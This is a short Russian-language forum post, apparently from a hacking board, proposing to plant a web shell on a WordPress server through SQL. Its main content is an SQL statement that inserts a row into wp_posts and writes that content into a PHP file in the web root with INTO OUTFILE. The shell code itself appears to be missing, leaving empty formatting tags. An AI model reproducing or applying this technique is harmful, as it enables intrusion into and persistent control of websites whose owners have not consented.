Если шелл надо залить, можно попробовать средствами sql, идея бред конечно, но если с правами поднапутанно, то может получиться
.SpoilerTarget" type="button">Spoiler
PHP код:
[COLOR="#000000"]insert into `wp_posts`(`post_content`,`post_title`,`post_excerpt`,`to_ping`,`pinged`,`post_content_filtered`) values ('[COLOR="#0000BB"][/COLOR]','1','0','0','0','0'); select `post_content` from `wp_posts` order by ID desc limit 1 into outfile '/var/www/html/wordpress/wp.php';[/COLOR]